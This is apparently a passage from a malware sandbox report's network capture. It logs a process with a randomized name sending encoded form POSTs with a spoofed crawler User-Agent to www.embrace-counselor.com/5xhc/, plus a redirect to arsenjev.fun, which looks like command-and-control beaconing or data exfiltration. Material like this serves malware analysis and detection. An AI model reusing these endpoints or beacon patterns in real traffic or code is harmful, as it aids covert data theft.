May 27, 2024 12:23:13.534738064 CEST	600	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 27 May 2024 10:23:13 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: http://arsenjev.fun/oqq6/?VlEHDVvh=rwgwPlALEUzYU2aVnuvDPIeIRMF/prMxeEAjcX/DBUkDQJY+y8rHCEXmR7eGsa/wgYTHR39WGVXgcrNwnNHcmkfubB89b8ls2WhHljXtxKg/z1p/kKzkfHY=&BHPD=o2nt Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.12	49768	202.233.67.46	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:23:19.385010004 CEST	721	OUT	POST /5xhc/ HTTP/1.1 Host: www.embrace-counselor.com Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.embrace-counselor.com Cache-Control: no-cache Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Referer: http://www.embrace-counselor.com/5xhc/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 42 6e 4f 2b 4e 31 30 4b 4c 46 41 50 64 6f 42 67 59 4a 32 30 32 37 4a 53 51 72 33 32 5a 56 5a 41 65 66 70 79 52 52 7a 51 67 65 37 76 5a 74 6b 43 6a 7a 53 57 76 69 5a 6e 41 36 6b 5a 7a 39 7a 47 61 67 4e 6d 65 66 72 5a 43 54 4b 76 67 50 44 47 33 5a 6f 45 42 2f 73 38 69 47 6e 45 44 59 30 38 72 33 73 66 72 30 78 4f 43 5a 31 77 52 4f 48 38 6a 79 76 65 7a 71 43 77 57 68 42 32 4b 72 6b 4d 75 59 52 32 34 45 4f 45 65 6e 70 71 48 56 48 6e 71 35 2b 34 7a 4b 64 41 55 52 63 38 2f 47 35 72 66 36 51 6d 56 34 67 64 58 55 78 53 37 35 6c 61 66 31 59 5a 4d 61 74 75 78 2f 41 45 37 59 77 44 70 51 3d 3d Data Ascii: VlEHDVvh=BnO+N10KLFAPdoBgYJ2027JSQr32ZVZAefpyRRzQge7vZtkCjzSWviZnA6kZz9zGagNmefrZCTKvgPDG3ZoEB/s8iGnEDY08r3sfr0xOCZ1wROH8jyvezqCwWhB2KrkMuYR24EOEenpqHVHnq5+4zKdAURc8/G5rf6QmV4gdXUxS75laf1YZMatux/AE7YwDpQ==
May 27, 2024 12:23:20.478626013 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 27 May 2024 10:23:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: User-Agent Link: <https://embrace-counselor.com/wp-json/>; rel="https://api.w.org/" Content-Encoding: br Data Raw: 34 63 31 31 0d 0a a5 ff 9f 00 00 fe fc ca b4 be dd 3f 5f 70 31 38 cd ec 4e 80 c8 ab 58 cc 12 6b cc 6e f5 41 b9 2f b9 bb dd a2 24 46 06 12 f9 32 0b 4d 24 00 01 c8 aa 2c d6 54 84 8a ad 0d df 6b 8d 65 8f 47 b6 37 64 af 67 25 1f 23 8f 63 b4 b3 3b 13 d6 ee 7e fd 6f 8e ae 2f 5f ef ff ab da cb 91 53 a4 4d 53 b9 ce 4c 5a 02 0f a4 9c 71 ca a4 f1 58 4d 8a 94 29 9a fd 9c e2 be f7 ee 4c f0 61 81 0f 0b 00 64 41 4a 2a 00 92 05 28 6a 3f e7 3e de 7b ee 7d 10 f0 f0 a8 21 3e ca 10 24 a8 11 41 3a 26 40 da 23 51 b6 8a 50 94 0a c9 93 42 96 53 d8 5d 1c a7 72 95 a2 21 e9 cf 48 1e 8f 27 e3 49 e1 4c 66 52 a4 4e 9b 5e fe 34 45 9a d2 4d 9f 3a cb e8 9b ff 7f 6d dd da e3 d6 fa 5e 1d 20 84 10 42 08 df f1 07 f0 d2 d7 5f 7e 78 f3 c9 e9 a3 5b 68 ee 5b 39 bb f2 d2 dc b7 12 49 a6 9a a3 d1 73 36 42 15 f3 0c 4b cd 2a a8 8e 46 35 93 0e ae 1f da 71 ab a5 7c fb be 9a 16 54 77 34 e2 52 3b a8 46 b3 2b 2f cd 81 55 b3 2b 2f b5 e0 19 e2 73 66 1d f8 a3 51 e7 6b 3c 19 3d fe 79 15 6b e1 68 54 6b db 32 8f 2b f0 c0 bd d0 6a 84 b8 56 1e 94 3f 1a 79 [TRUNCATED] Data Ascii: 4c11?_p18NXknA/$F2M$,TkeG7dg%#c;~o/_SMSLZqXM)LadAJ(j?>{}!>$A:&@#QPBS]r!H'ILfRN^4EM:m^ B_~x[h[9Is6BKF5q\|Tw4R;F+/U+/sfQk<=ykhTk2+jV?y`Z!s:85RB:p!`iUyXX/ju]UZ)]k)]yIu,rXU4P]S]6ryG&+_RXpt3#{{QX`ppc#&=X<_81csV^Vo,{S4p7lgGx$dx'\-(u[Bo~%$&xv% f)Ms4;l9\7l?? xi.X8,p8n9w?\|o/!~?Wgdx{{/_?oo_?
May 27, 2024 12:23:20.478648901 CEST	1236	IN	Data Raw: b0 fd c3 b0 fd fd 97 97 ff fa d9 7f 79 f7 8b 5f fe fb 97 7f fc ce 70 f9 c7 e1 f2 c3 e1 c5 27 c3 e5 5f 86 17 bf 1f 5e 7c 3a 6c 7f 37 6c 7f 3e 6c 3f 1c de de 0e 2f de 1f 5e bc 37 bc f8 74 b8 fc df c3 8b 17 c3 e5 ff 1b 5e 7c fa f9 fb 97 ff f9 97 df Data Ascii: y_p'_^\|:l7l>l?/^7t^\|???autlr~8l_w_{;}:l?~?Oo~aaag8l//\|?G?}\|>
May 27, 2024 12:23:20.478662014 CEST	1236	IN	Data Raw: f7 f0 e2 73 ce 4e 62 d3 f3 d4 1e 62 d3 07 31 52 e1 8a 8e 98 cb 1f 14 82 5d 51 44 77 85 c5 eb 49 9c 39 44 dd 98 98 a2 b9 54 fa 72 78 f5 ea 5c 69 c5 63 70 e9 9b 6f 76 6a d1 17 a5 f6 5e b7 45 0b aa 93 10 a5 30 95 f2 ea 99 76 71 c3 2b 7c f8 f3 11 24 Data Ascii: sNbb1R]QDwI9DTrx\icpovj^E0vq+\|$EX`gB(a;p_in2[of~(OIjRu"YHM/^4ERSMLlS4$QRS:6dk6!Yb'T#F^kDul#TCd{rvuO89
May 27, 2024 12:23:20.478678942 CEST	1236	IN	Data Raw: 3a a0 74 e3 ba 32 74 9d 71 03 dc 80 8d 1e 11 ec c6 76 e5 6a 66 bd eb 63 64 74 77 d3 32 a1 d6 95 25 e6 23 6f f2 e5 1c 2c ec 69 99 2b ed f7 de f0 2b 03 67 41 10 fe 1d a5 cb d6 cc c1 e6 b0 69 05 1b a9 b3 e2 ad 4e 7b 08 df 5a ff 3b e9 1c 89 22 f2 22 Data Ascii: :t2tqvjfcdtw2%#o,i++gAiN{Z;"":ov"<+%bdAeY_~^j[]6lu^O[%lB%v%8YI]+-=n-<R7y/?$^P(PXCgXC
May 27, 2024 12:23:20.478691101 CEST	1236	IN	Data Raw: 4d 39 45 51 3c e8 28 10 c2 d0 52 af bf b4 cc 20 88 34 66 bc 80 7f 14 83 b4 d3 d1 4a 76 ba b0 51 c7 b5 72 43 da c9 6f ca 61 31 08 46 f0 3e 14 9b 0c 0d 1e c4 d4 bf 02 88 8c 56 ac 7a d7 06 21 ac de 06 8a 19 c1 18 43 c2 07 70 ec ba b2 05 d5 3d a9 fb Data Ascii: M9EQ<(R 4fJvQrCoa1F>Vz!Cp=l'iv~mxk%g%Y=u%1wAB@&\SdR)$a)fYJl<QKNl.`"Q`69;($fr:GGDpf
May 27, 2024 12:23:20.478701115 CEST	1236	IN	Data Raw: de ea 9f 7e eb 69 b5 7c 72 7c 7c 7c fc ca e4 ad f9 ed 5b 20 1e 54 dd 7e e5 e1 d3 e5 8d e3 cc cf 61 fe e3 dc 3a 97 b7 5e fd f6 ab 27 51 7c 7f 79 fa f2 8d e6 f4 ce 0d 7d 7a e7 f8 f8 f8 f8 f1 37 8f 1f de 9d dc 7f 9c d0 63 cf 8f 29 6f 3f 39 7f dc bd Data Ascii: ~i\|r\|\|\|[ T~a:^'Q\|y}z7c)o?9H7xd8nJ9TDV}>K9n_~\|i'F5cGwKK"?$t]Gqj_`Eo=FUujoLw2\r(hJx
May 27, 2024 12:23:20.478729963 CEST	1236	IN	Data Raw: 2c 37 84 63 0b 0b 01 cb c7 9e 59 87 04 e3 49 76 25 3f 3f 8d c2 79 66 c3 9d 9a f1 38 ce 82 4d e7 aa 01 c9 a0 0c 0c f3 83 3e d5 53 77 85 f2 66 10 b1 64 92 35 93 73 3d 8a 17 6c ea a2 15 ba 72 b4 02 f1 cb 36 0d 8f 72 86 33 b8 12 0f a8 66 f7 83 bc 36 Data Ascii: ,7cYIv%??yf8M>Swfd5s=lr6r3f6y-C;rIdCu'HR$@qX-u0p1%}>:m~)'@mUit4tdL75pXP{S)K)5;UPh:6,^Wskb
May 27, 2024 12:23:20.478740931 CEST	1236	IN	Data Raw: 0e 15 a6 9f 4b c6 c2 4a b4 93 0e bf aa 67 1a 0b a9 a5 1b 90 c9 af 1d 92 49 a0 e1 c0 e0 2d b0 1b 45 3a 17 4a 2a 51 55 fc 29 ed 8c c3 52 24 14 e2 8c 7a ad dc 91 f4 c7 e9 c4 84 00 03 69 d5 92 da 46 05 1c f8 e0 7a 13 d3 23 29 64 84 87 85 08 8c fc a0 Data Ascii: KJgI-E:J*QU)R$ziFz#)d]AaQpHDJy$$9-kaBn#y%%;Z2`,1BIieNB)Y"\|}BUe:z+``M2jt[Q'a=,g]RZVvQA`
May 27, 2024 12:23:20.478760958 CEST	1236	IN	Data Raw: 12 6a 1b b7 84 af 1b 6c c1 33 63 ad d1 c6 17 44 c1 5e 0f 9d c6 f5 71 46 24 43 42 d7 59 cb 07 71 48 f5 fa 65 40 4d c1 42 d5 cd f4 d6 45 ac 4f d1 52 2b 4f e9 79 2e 4b ca 18 40 9a 83 d5 11 09 69 d7 f6 e0 5f a6 ba 14 4f f1 80 e5 35 44 6c 5e 1e dc a1 Data Ascii: jl3cD^qF$CBYqHe@MBEOR+Oy.K@i_O5Dl^Bi`d&(a26CcTxB&(_xbka3Y6A]2u.T%[V=`gR!zEa*+;OxW`b")[{oT0uPB+V5)&9xY
May 27, 2024 12:23:20.478775024 CEST	1236	IN	Data Raw: 88 67 6b 57 80 d2 af 70 f1 da 2d 93 12 7c e4 2b 6c b6 a9 3f 67 e7 cc 75 a9 98 ef 77 b2 d0 74 92 d9 b7 38 c8 08 c3 7e 66 ed 8e af 36 86 63 6b 31 90 7e 2e d4 ae 90 28 d9 cf fd 25 b3 0d a4 7f 6c 12 c2 98 11 74 fa c7 80 79 07 0f 32 ae 85 8c 8c 62 d0 Data Ascii: gkWp-\|+l?guwt8~f6ck1~.(%lty2b{@Q8FG##leK\jYVR4s$]gRp'}(Z.`s1tqX/=bA--Z]'\ 6!=<:[Ha=
May 27, 2024 12:23:20.483882904 CEST	1236	IN	Data Raw: a2 ef 7d 58 2c 8c a5 72 9d 52 78 4b 3f 07 56 25 1a 9c 22 11 9d 9d 03 43 1d fe a2 0b 24 05 4d 38 16 92 2a c8 8c ef fd ea de 16 3a 74 36 13 60 82 a9 00 ad ec 51 aa 59 a8 74 a8 c9 53 cd 04 03 0e 2b d3 66 8c 4e 20 b2 a4 84 d2 78 12 02 c6 d6 bd 65 63 Data Ascii: }X,rRxK?V%"C$M8:t6`QYtS+fN xec!q]MijC-P-`g^qMu.uHCkAh"5laQO{4=Tc.Z&#=>V%__BMz#9a2H0GRG+HI)PSqZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.12	49769	202.233.67.46	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:23:21.929042101 CEST	741	OUT	POST /5xhc/ HTTP/1.1 Host: www.embrace-counselor.com Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.embrace-counselor.com Cache-Control: no-cache Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Referer: http://www.embrace-counselor.com/5xhc/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 42 6e 4f 2b 4e 31 30 4b 4c 46 41 50 63 4d 46 67 61 71 65 30 6e 62 4a 52 54 72 33 32 58 31 5a 36 65 65 56 79 52 51 6e 36 67 73 66 76 61 49 59 43 69 79 53 57 6a 43 5a 6e 55 4b 6b 59 33 39 7a 52 61 67 52 45 65 66 58 5a 43 54 65 76 67 4f 7a 47 33 75 38 46 62 50 73 69 6b 47 6e 47 4f 34 30 38 72 33 73 66 72 30 30 6c 43 64 5a 77 51 39 66 38 78 67 48 64 77 71 43 78 43 78 42 32 4f 72 6c 48 75 59 52 45 34 46 43 71 65 68 6c 71 48 56 33 6e 71 73 65 37 38 4b 64 43 61 78 63 72 34 6e 4a 68 58 35 34 5a 58 72 77 6e 4a 47 6c 6c 7a 66 30 41 41 48 51 50 5a 5a 35 6a 38 6f 35 30 32 62 4e 4b 79 5a 32 61 46 6f 62 4a 42 51 69 73 6c 59 51 36 39 35 4c 72 58 2b 6f 3d Data Ascii: VlEHDVvh=BnO+N10KLFAPcMFgaqe0nbJRTr32X1Z6eeVyRQn6gsfvaIYCiySWjCZnUKkY39zRagREefXZCTevgOzG3u8FbPsikGnGO408r3sfr00lCdZwQ9f8xgHdwqCxCxB2OrlHuYRE4FCqehlqHV3nqse78KdCaxcr4nJhX54ZXrwnJGllzf0AAHQPZZ5j8o502bNKyZ2aFobJBQislYQ695LrX+o=
May 27, 2024 12:23:22.841356039 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 27 May 2024 10:23:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: User-Agent Link: <https://embrace-counselor.com/wp-json/>; rel="https://api.w.org/" Content-Encoding: br Data Raw: 34 63 31 31 0d 0a a5 ff 9f 00 00 fe fc ca b4 be dd 3f 5f 70 31 38 cd ec 4e 80 c8 ab 58 cc 12 6b cc 6e f5 41 b9 2f b9 bb dd a2 24 46 06 12 f9 32 0b 4d 24 00 01 c8 aa 2c d6 54 84 8a ad 0d df 6b 8d 65 8f 47 b6 37 64 af 67 25 1f 23 8f 63 b4 b3 3b 13 d6 ee 7e fd 6f 8e ae 2f 5f ef ff ab da cb 91 53 a4 4d 53 b9 ce 4c 5a 02 0f a4 9c 71 ca a4 f1 58 4d 8a 94 29 9a fd 9c e2 be f7 ee 4c f0 61 81 0f 0b 00 64 41 4a 2a 00 92 05 28 6a 3f e7 3e de 7b ee 7d 10 f0 f0 a8 21 3e ca 10 24 a8 11 41 3a 26 40 da 23 51 b6 8a 50 94 0a c9 93 42 96 53 d8 5d 1c a7 72 95 a2 21 e9 cf 48 1e 8f 27 e3 49 e1 4c 66 52 a4 4e 9b 5e fe 34 45 9a d2 4d 9f 3a cb e8 9b ff 7f 6d dd da e3 d6 fa 5e 1d 20 84 10 42 08 df f1 07 f0 d2 d7 5f 7e 78 f3 c9 e9 a3 5b 68 ee 5b 39 bb f2 d2 dc b7 12 49 a6 9a a3 d1 73 36 42 15 f3 0c 4b cd 2a a8 8e 46 35 93 0e ae 1f da 71 ab a5 7c fb be 9a 16 54 77 34 e2 52 3b a8 46 b3 2b 2f cd 81 55 b3 2b 2f b5 e0 19 e2 73 66 1d f8 a3 51 e7 6b 3c 19 3d fe 79 15 6b e1 68 54 6b db 32 8f 2b f0 c0 bd d0 6a 84 b8 56 1e 94 3f 1a 79 [TRUNCATED] Data Ascii: 4c11?_p18NXknA/$F2M$,TkeG7dg%#c;~o/_SMSLZqXM)LadAJ(j?>{}!>$A:&@#QPBS]r!H'ILfRN^4EM:m^ B_~x[h[9Is6BKF5q\|Tw4R;F+/U+/sfQk<=ykhTk2+jV?y`Z!s:85RB:p!`iUyXX/ju]UZ)]k)]yIu,rXU4P]S]6ryG&+_RXpt3#{{QX`ppc#&=X<_81csV^Vo,{S4p7lgGx$dx'\-(u[Bo~%$&xv% f)Ms4;l9\7l?? xi.X8,p8n9w?\|o/!~?Wgdx{{/_?oo_?
May 27, 2024 12:23:22.841434002 CEST	1236	IN	Data Raw: b0 fd c3 b0 fd fd 97 97 ff fa d9 7f 79 f7 8b 5f fe fb 97 7f fc ce 70 f9 c7 e1 f2 c3 e1 c5 27 c3 e5 5f 86 17 bf 1f 5e 7c 3a 6c 7f 37 6c 7f 3e 6c 3f 1c de de 0e 2f de 1f 5e bc 37 bc f8 74 b8 fc df c3 8b 17 c3 e5 ff 1b 5e 7c fa f9 fb 97 ff f9 97 df Data Ascii: y_p'_^\|:l7l>l?/^7t^\|???autlr~8l_w_{;}:l?~?Oo~aaag8l//\|?G?}\|>
May 27, 2024 12:23:22.841451883 CEST	1236	IN	Data Raw: f7 f0 e2 73 ce 4e 62 d3 f3 d4 1e 62 d3 07 31 52 e1 8a 8e 98 cb 1f 14 82 5d 51 44 77 85 c5 eb 49 9c 39 44 dd 98 98 a2 b9 54 fa 72 78 f5 ea 5c 69 c5 63 70 e9 9b 6f 76 6a d1 17 a5 f6 5e b7 45 0b aa 93 10 a5 30 95 f2 ea 99 76 71 c3 2b 7c f8 f3 11 24 Data Ascii: sNbb1R]QDwI9DTrx\icpovj^E0vq+\|$EX`gB(a;p_in2[of~(OIjRu"YHM/^4ERSMLlS4$QRS:6dk6!Yb'T#F^kDul#TCd{rvuO89
May 27, 2024 12:23:22.841464996 CEST	672	IN	Data Raw: 3a a0 74 e3 ba 32 74 9d 71 03 dc 80 8d 1e 11 ec c6 76 e5 6a 66 bd eb 63 64 74 77 d3 32 a1 d6 95 25 e6 23 6f f2 e5 1c 2c ec 69 99 2b ed f7 de f0 2b 03 67 41 10 fe 1d a5 cb d6 cc c1 e6 b0 69 05 1b a9 b3 e2 ad 4e 7b 08 df 5a ff 3b e9 1c 89 22 f2 22 Data Ascii: :t2tqvjfcdtw2%#o,i++gAiN{Z;"":ov"<+%bdAeY_~^j[]6lu^O[%lB%v%8YI]+-=n-<R7y/?$^P(PXCgXC
May 27, 2024 12:23:22.841475010 CEST	1236	IN	Data Raw: ab 5a a1 4a 66 d7 7d 61 03 a3 4d 6f 5f 7b dd f3 77 5e 8e c7 d4 f4 85 15 b4 83 94 ec 6a bb 8d 5a f4 50 c5 f7 4e a5 ae 56 33 c2 2a 57 ae 46 16 3d ca da 6b 93 e3 28 a5 a6 ef f3 99 d8 10 54 1e 8c 75 5d 23 b2 14 55 03 be 18 0c 92 15 28 56 42 3f 18 d7 Data Ascii: ZJf}aMo_{w^jZPNV3*WF=k(Tu]#U(VB?/V\~~uH8Q].\'FjkSAbfl's'. ]L9!? I%4paXfXZf }.\~TtgD\2fbf]RO,b,`'
May 27, 2024 12:23:22.841485977 CEST	1236	IN	Data Raw: 08 6d a8 1a 94 2e d3 0e 6a 59 3d 4f 64 74 97 8e 64 1b 0e 35 a0 20 07 57 6b a4 b5 ae 42 89 03 8e d9 b3 da 20 87 e9 54 05 56 0a 72 2a 60 d7 71 52 b4 c9 df 2a 22 31 13 1c ce 79 0b 9e cf d3 b4 69 6c fa 5e aa 95 14 45 a6 47 89 e9 ff 6d a9 67 86 8c 7e Data Ascii: m.jY=Odtd5 WkB TVr`qR"1yil^EGmg~a&FxD=.w`?j4R4$uAncj6j&BfW<f)o@Pggkq^}WER!rW."!:B\|4NdCB&;NNQX~a;p
May 27, 2024 12:23:22.841497898 CEST	1236	IN	Data Raw: d6 a5 84 05 28 41 54 21 1a 4c 2f 6e 14 01 72 30 70 72 81 08 87 47 ee e4 41 c7 6b 84 5d d0 ee 70 0a a9 0c 71 51 79 a6 06 22 d4 eb 56 b5 4a 76 47 95 63 dd 98 72 20 a7 ab a4 db a7 8e f5 92 29 2e 22 0b 4f 27 b2 ed bc 38 32 3d da a1 94 4e 2d 96 e5 5d Data Ascii: (AT!L/nr0prGAk]pqQy"VJvGcr )."O'82=N-]u7XC;C]W,{S_^ThW%/[lX9p<^uD"k$!b9vd@U2wP5/ Rf\z9g:\iE"5x!J[x_Yz2
May 27, 2024 12:23:22.841511965 CEST	1236	IN	Data Raw: 49 ce 27 46 08 51 1e 5b d2 76 cc 99 2f 5f 73 9c f9 69 4d d8 c0 82 3a c2 26 fc 02 d6 56 48 53 ca 20 cb c1 21 24 33 1a 8a 61 6e bd b5 d3 41 4c c0 57 af a9 68 c1 59 2f 78 18 a2 06 f4 90 a2 68 75 25 6a 01 15 77 27 42 1f a7 8c 76 fe 97 85 d4 30 49 6c Data Ascii: I'FQ[v/_siM:&VHS !$3anALWhY/xhu%jw'Bv0IlU[&L=>DfC>U5[kyj`V8i\X17Jc'LgM<^7"f]2p%T3D(.l*y0G`,Z>bmJb(8'BT+7
May 27, 2024 12:23:22.841540098 CEST	1236	IN	Data Raw: be 97 bd c1 bf 08 f0 55 8a 7e cd 08 87 a7 be 8f 97 c2 76 61 20 ad e7 be 23 42 a8 a0 89 72 d8 b3 34 1b 25 18 43 17 67 56 bb 1c 63 cf 40 bc 11 c2 16 ca 11 7d 81 6c f2 6a 48 b3 af 4e 2e 03 11 55 48 4b 72 48 71 48 40 3c 67 59 88 13 0f c0 1c 5b d0 3f Data Ascii: U~va #Br4%CgVc@}ljHN.UHKrHqH@<gY[?JM$xi?:3:TIQ]<Z[)/3Wr^nZGC@%&"}=qV2JHSyQtq)W#(@}1`(
May 27, 2024 12:23:22.841552019 CEST	1236	IN	Data Raw: ab 57 a5 99 9c 6e 77 ae ed 0c 91 74 00 74 bc 6b 7f 21 b8 88 53 29 4c e9 6e a1 d8 ab 26 93 c5 b2 90 8d 6f 48 9f 41 1a 11 8c 24 8a 1d 25 e2 44 b3 9f 16 27 93 c5 b2 b7 35 c2 7d 62 43 7a d5 9d 38 c0 a9 d0 33 f6 15 5f 75 a9 c7 65 1c 6a ce e2 8b 8f a7 Data Ascii: Wnwttk!S)Ln&oHA$%D'5}bCz83_uej,'o3 ]+v}AX3y0)\|sy=xXo?Eb"XSH$&=D]6$TsJJ>&tC5E>W;5YJm+-w96ZtC
May 27, 2024 12:23:22.846613884 CEST	1236	IN	Data Raw: 00 4b 2a bd 30 1e 96 bb 48 23 b6 e4 ad c4 de 5e 82 4c 0e ad f1 ab 96 97 1e f1 10 7c 9e 21 1e 7a 1f aa 3d eb ae 14 13 40 52 01 92 95 28 0e b6 5f e7 b5 9e 59 93 ee c6 95 9a 02 81 2e 56 ab 59 e7 d8 10 ec 88 78 f4 91 e9 d4 2e 93 27 79 8e 2d 29 11 f2 Data Ascii: K0H#^L\|!z=@R(_Y.VYx.'y-)j%mO~yNFjO[q&C1N"XX?W5;oFd6Q,\3,_,>$y+FK}<VD2?T`.cAOZL

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.12	49770	202.233.67.46	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:23:24.469042063 CEST	1754	OUT	POST /5xhc/ HTTP/1.1 Host: www.embrace-counselor.com Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.embrace-counselor.com Cache-Control: no-cache Connection: close Content-Length: 1237 Content-Type: application/x-www-form-urlencoded Referer: http://www.embrace-counselor.com/5xhc/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 42 6e 4f 2b 4e 31 30 4b 4c 46 41 50 63 4d 46 67 61 71 65 30 6e 62 4a 52 54 72 33 32 58 31 5a 36 65 65 56 79 52 51 6e 36 67 73 58 76 61 39 55 43 69 56 75 57 74 69 5a 6e 49 61 6b 56 33 39 7a 4d 61 67 4a 41 65 66 61 73 43 51 6d 76 78 63 72 47 2f 38 45 46 56 2f 73 69 6d 47 6e 48 44 59 30 70 72 33 38 62 72 30 45 6c 43 64 5a 77 51 38 76 38 79 79 76 64 32 71 43 77 57 68 42 71 4b 72 6b 67 75 59 70 75 34 46 47 55 65 52 46 71 47 78 54 6e 6f 59 2b 37 31 4b 64 63 58 52 64 75 34 6e 45 37 58 34 56 6f 58 6f 73 4e 4a 45 31 6c 32 4f 55 66 46 32 4d 6f 48 50 35 4f 2f 49 78 6c 32 6f 31 57 2f 35 71 50 42 2b 2f 37 44 77 65 76 39 4c 70 4b 6b 70 79 74 46 72 71 47 48 68 52 72 64 51 78 76 42 31 52 45 6b 77 70 39 69 31 2f 2b 39 77 69 63 59 67 61 4f 58 71 67 44 77 51 77 4e 74 50 65 58 77 53 79 59 32 45 77 74 57 68 6b 55 69 57 2b 42 5a 6a 69 6f 76 54 54 73 6e 6c 74 5a 37 46 4c 49 4e 75 4b 63 46 52 49 30 4c 6a 70 74 5a 4f 2b 48 58 53 4f 33 59 44 66 39 34 6f 55 62 50 4e 2b 6c 36 39 30 79 35 50 4c 49 51 [TRUNCATED] Data Ascii: VlEHDVvh=BnO+N10KLFAPcMFgaqe0nbJRTr32X1Z6eeVyRQn6gsXva9UCiVuWtiZnIakV39zMagJAefasCQmvxcrG/8EFV/simGnHDY0pr38br0ElCdZwQ8v8yyvd2qCwWhBqKrkguYpu4FGUeRFqGxTnoY+71KdcXRdu4nE7X4VoXosNJE1l2OUfF2MoHP5O/Ixl2o1W/5qPB+/7Dwev9LpKkpytFrqGHhRrdQxvB1REkwp9i1/+9wicYgaOXqgDwQwNtPeXwSyY2EwtWhkUiW+BZjiovTTsnltZ7FLINuKcFRI0LjptZO+HXSO3YDf94oUbPN+l690y5PLIQGND0VzQvrHGxBMNNelXQ+S7Psp/IkSKWPaG7r1YfPdia8jONZ7w40EXQKoQdgP/jamVTNyDJFAbTrfUek5gyzpg3dCgNsjZkcg/ei3WlaPJADareLoxx5aLl20uHHcyBCmVOU9rnyp7w4/g8Sdieo6aZXlqgMPSyLgE/8wEALP+DhHkCJQ8wfgxolUHQAq1bK6/Y3AiMEtMimklylZDWopn7QvdTiT7jtKAEg6mxP6wNazKW/iZNARmuogMo0P6RG72Em8ZcNvbE36im+M3u2vwpxm32aOj5EGXHHFuN7Pfwwvl9IrGFw0yvqEORg/O67lcPS3DQwBkWEJoC4uei5isL101AfXLbVd0cJ1tYIwmvvWECh+NSXFmzBWFzHq/lbX/92FgUN61PyYc/EQA2DqJDDmFOs+lsRe797F4PJVQbticseYpif+QxeMmeLZZHcfH4BpNku8fSWV5JL1oFLhidhbjoCyEpHVhZTBA/x4P89KHQm2IRRpjPUAiPOkFNPZz+jX9ULKc1ewFwBG9+tTLa5mjOZXhnPxAEj08oKQ7SdaxrLmeU65Y1PAgmAwrD498ZcqHNvQWfAAsG7UcKTGcFtE/lCfnmiJnitxSCU8ouyZX+NhxK7+hlqQgXawyAMGMxJj4D/OLhcAIo9PE2bKj7aFq6u6XrE7 [TRUNCATED]
